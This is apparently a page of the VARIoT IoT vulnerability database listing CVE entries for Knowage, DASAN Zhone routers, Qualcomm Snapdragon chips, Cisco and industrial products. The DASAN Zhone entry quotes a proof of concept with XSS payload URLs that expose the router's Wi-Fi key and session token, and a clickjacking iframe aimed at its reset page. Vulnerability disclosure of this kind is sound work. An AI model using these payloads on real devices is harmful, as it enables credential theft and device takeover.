VARIoT IoT vulnerabilities database
| VAR-201909-0676 | CVE-2019-13349 | Knowage Vulnerabilities related to certificate and password management |
CVSS V2: 4.0 CVSS V3: 4.9 Severity: MEDIUM |
In Knowage through 6.1.1, an authenticated user that accesses the users page will obtain all user password hashes. Knowage Contains vulnerabilities related to certificate and password management.Information may be obtained
| VAR-201909-0690 | CVE-2019-13190 | Knowage Authentication vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
In Knowage through 6.1.1, the sign up page does not invalidate a valid CAPTCHA token. This allows for CAPTCHA bypass in the signup page. Knowage Contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state
| VAR-201909-1467 | CVE-2019-10677 | DASAN Zhone ZNID GPON 2426A EU Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Multiple Cross-Site Scripting (XSS) issues in the web interface on DASAN Zhone ZNID GPON 2426A EU version S3.1.285 devices allow a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameter: /zhndnsdisplay.cmd (name), /wlsecrefresh.wl (wlWscCfgMethod, wl_wsc_reg). DASAN Zhone ZNID GPON 2426A EU The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. DASAN Zhone ZNID GPON 2426A EU is a wireless router from DASAN Korea. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code.
# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677
= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
| VAR-201909-1428 | CVE-2019-10497 | plural Snapdragon Vulnerability in using freed memory in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Use after free issue occurs If another instance of open for voice_svc node has been called from application without closing the previous one. in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a vulnerability related to the use of released memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in Audio in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products
| VAR-201909-1457 | CVE-2019-10506 | plural Snapdragon Vulnerability related to input validation in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
While processing QCA_NL80211_VENDOR_SUBCMD_AVOID_FREQUENCY vendor command, driver does not validate the data obtained from the user space which could be invalid and thus leads to an undesired behaviour in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in MDM9206, MDM9607, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDM630, SDM660, SDX24. plural Snapdragon The product contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. An input validation error vulnerability exists in WLAN in several Qualcomm products. The vulnerability stems from the failure of the network system or product to properly validate the input data
| VAR-201909-1458 | CVE-2019-10507 | plural Snapdragon Product out-of-bounds vulnerability |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Lack of check of extscan change results received from firmware can lead to an out of buffer read in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCS605, SD 210/SD 212/SD 205, SD 425, SD 430, SD 600, SD 625, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9206 and others are products of Qualcomm (Qualcomm). MDM9206 is a central processing unit (CPU) product. MDM9607 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in WLAN in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc
| VAR-201909-1123 | CVE-2019-2284 | plural Snapdragon Vulnerability in using freed memory in products |
CVSS V2: 4.4 CVSS V3: 7.0 Severity: HIGH |
Possible use-after-free issue due to a race condition while calling camera ioctl concurrently in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MSM8909W, QCS405, QCS605, Qualcomm 215, SD 425, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 845 / SD 850, SD 855, SDM439, SDX24. plural Snapdragon The product contains a vulnerability related to the use of released memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SD 712 is a central processing unit (CPU) product. SD 710 is a central processing unit (CPU) product. SDX24 is a modem. A resource management error vulnerability exists in the Camera in several Qualcomm products. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products
| VAR-201909-0986 | CVE-2019-2333 | plural Snapdragon Classic buffer overflow vulnerability in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Buffer overflow due to improper validation of buffer size while IPA driver processing to perform read operation in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9650, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9607 and others are products of Qualcomm (Qualcomm). MDM9607 is a central processing unit (CPU) product. MDM9650 is a central processing unit (CPU) product. SDX24 is a modem. A buffer error vulnerability exists in the IPA driver in several Qualcomm products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc
| VAR-201909-0987 | CVE-2019-2341 | plural Snapdragon Classic buffer overflow vulnerability in products |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Buffer overflow when the audio buffer size provided by user is larger than the maximum allowable audio buffer size. in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, QCS405, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. plural Snapdragon The product contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
| VAR-201909-0985 | CVE-2019-1976 | Cisco Industrial Network Director Vulnerabilities related to certificate and password management |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
A vulnerability in the “plug-and-play” services component of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to access sensitive information on an affected device. The vulnerability is due to improper access restrictions on the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to access running configuration information about devices managed by the IND, including administrative credentials. Cisco Industrial Network Director (IND) is an industrial automation management system from Cisco. The system is automated through the visualization of industrial Ethernet infrastructure
| VAR-201909-0206 | CVE-2019-12633 | Cisco Unified Contact Center Express Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on a targeted system. The vulnerability is due to improper validation of user-supplied input on the affected system. An attacker could exploit this vulnerability by sending the user of the web application a crafted request. If the request is processed, the attacker could access the system and perform unauthorized actions. This component supports functions such as self-service voice service, call distribution, and customer access control. A code issue vulnerability exists in Cisco Unified CCX releases prior to 11.6(2)ES04 and releases prior to 12.0(1)SU0.1
| VAR-201909-0154 | CVE-2019-12645 | Cisco Jabber Client Framework Input validation vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in Cisco Jabber Client Framework (JCF) for Mac Software, installed as part of the Cisco Jabber for Mac client, could allow an authenticated, local attacker to execute arbitrary code on an affected device The vulnerability is due to improper file level permissions on an affected device when it is running Cisco JCF for Mac Software. An attacker could exploit this vulnerability by authenticating to the affected device and executing arbitrary code or potentially modifying certain configuration files. A successful exploit could allow the attacker to execute arbitrary code or modify certain configuration files on the device using the privileges of the installed Cisco JCF for Mac Software. Cisco Jabber Client Framework (JCF) Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco Jabber Client Framework (JCF) is a set of unified communication client framework of Cisco (Cisco). The framework provides online status display, instant messaging, voice and other functions. An input validation error vulnerability exists in Cisco JCF 12.6(1) and earlier versions based on the Mac platform. The vulnerability is caused by the program assigning incorrect permissions to files
| VAR-201909-0207 | CVE-2019-12635 | Cisco Content Security Management Appliance Software Authorization vulnerability |
CVSS V2: 3.5 CVSS V3: 4.3 Severity: MEDIUM |
A vulnerability in the authorization module of Cisco Content Security Management Appliance (SMA) Software could allow an authenticated, remote attacker to gain out-of-scope access to email. The vulnerability exists because the affected software does not correctly implement role permission controls. An attacker could exploit this vulnerability by using a custom role with specific permissions. A successful exploit could allow the attacker to access the spam quarantine of other users. This appliance is mainly used to manage all policies, reports, audit information, etc. of email and web security appliances
| VAR-201909-0205 | CVE-2019-12632 | Cisco Finesse Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in Cisco Finesse could allow an unauthenticated, remote attacker to bypass access controls and conduct a server-side request forgery (SSRF) attack on an affected system. The vulnerability exists because the affected system does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to a user of the web application. A successful exploit could allow the attacker to access the system and perform unauthorized actions. Cisco Finesse Contains an input validation vulnerability.Information may be tampered with. Cisco Finesse is a set of call center management software developed by Cisco
| VAR-201909-0153 | CVE-2019-12644 | Cisco Identity Services Engine Software Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability exists because the web-based management interface of the affected device does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information
| VAR-201909-1561 | No CVE | Denial of Service Vulnerability in MITSUBISHI PLC (CNVD-2019-30336) |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric.
MITSUBISHI PLC has a denial of service vulnerability that could be exploited by an attacker to cause a denial of service
| VAR-201909-1563 | No CVE | MITSUBISHI PLC has a denial of service vulnerability |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric (Mitsubishi Electric) company.
MITSUBISHI PLC has a denial of service vulnerability, which can be exploited by attackers to cause a denial of service
| VAR-201909-1562 | No CVE | MITSUBISHI PLC has a denial of service vulnerability (CNVD-2019-30335) |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
MITSUBISHI PLC is a programmable controller product of Japan's Mitsubishi Electric (Mitsubishi Electric) company.
MITSUBISHI PLC has a denial of service vulnerability, which can be exploited by attackers to cause a denial of service
| VAR-201909-1545 | No CVE | ABB zenon Editor has dll hijacking vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The ABB Group ranks among the world's top 500 companies and is headquartered in Zurich, Switzerland, dedicated to providing solutions for customers in the industrial and power industries.
ABB zenon Editor has a dll hijacking vulnerability that can be used by attackers to gain server permissions
| VAR-201911-1433 | CVE-2019-2258 | plural Snapdragon Vulnerability related to array index verification in products |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Improper validation of array index causes OOB write and then leads to memory corruption in MMCP in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in MDM9150, MDM9607, MDM9615, MDM9625, MDM9635M, MDM9640, MDM9650, MDM9655, MSM8909W, MSM8996AU, QCS605, Qualcomm 215, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 636, SD 650/52, SD 665, SD 675, SD 712 / SD 710 / SD 670, SD 730, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SD 8CX, SDA660, SDM439, SDM630, SDM660, SDX20, Snapdragon_High_Med_2016, SXR1130. plural Snapdragon The product contains a vulnerability related to array index validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm MDM9607, etc. are all products of Qualcomm. MDM9607 is a central processing unit (CPU) product. Qualcomm MDM9150 is a central processing unit (CPU) product. SDX20 is a modem.
MMCP in many Qualcomm products has an input validation error vulnerability. The vulnerability stems from the fact that the network system or product did not correctly verify the input data, and there is currently no detailed vulnerability details provided